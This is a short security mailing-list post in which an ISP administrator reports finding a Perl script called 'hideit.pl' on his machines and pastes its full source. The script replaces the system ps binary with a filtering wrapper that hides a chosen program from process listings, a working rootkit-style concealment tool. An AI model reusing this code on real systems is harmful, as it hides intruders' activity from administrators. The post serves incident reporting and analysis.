hideit.pl hides any program from ps?!

["Richard Collins" <braingain88 () hotmail com>]

hi..i'm an admin of a small isp i found this program on all my workstation 
it was called hideit.pl it seems to hide any program from ps!


#This little perl script will replace the ps program with a fake ps #that
#doesn't show the program u want to hide, the original ps replaced #will be 
saved
#in /bin/ps.bak and can be restored by running:ps2.pl Restore
#stupid but usefull!;)
#by SLACKo from Dalnet
#!/usr/bin/perl
if ($#ARGV<0) {die "Usage : $0 Program (To hide a program from ps) or
       $0 Restore (To restore ps)\n"};
$eshta = `whereis ps` =~ /^\S+:\s+(\S+)/;$new=$1;
restore() if ($ARGV[0] eq "Restore");
system("cp $new /bin/ps.bak") if (! -f '/bin/ps.bak');
open(HH,">$new") or die "$!\n";
$string = <<"EOF";
#!/usr/bin/perl
open(PS,"/bin/ps.bak \$ARGV[0]|") or die "$!\n";
while (<PS>) {
s/perl(.*)bin(.*)/ps \$ARGV[0]/g;
next if (/($ARGV[0]|ps.bak)/);
print;}
EOF
print HH "$string";close(HH,PS);
sub restore {system("cp /bin/ps.bak $new");exit;}


_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com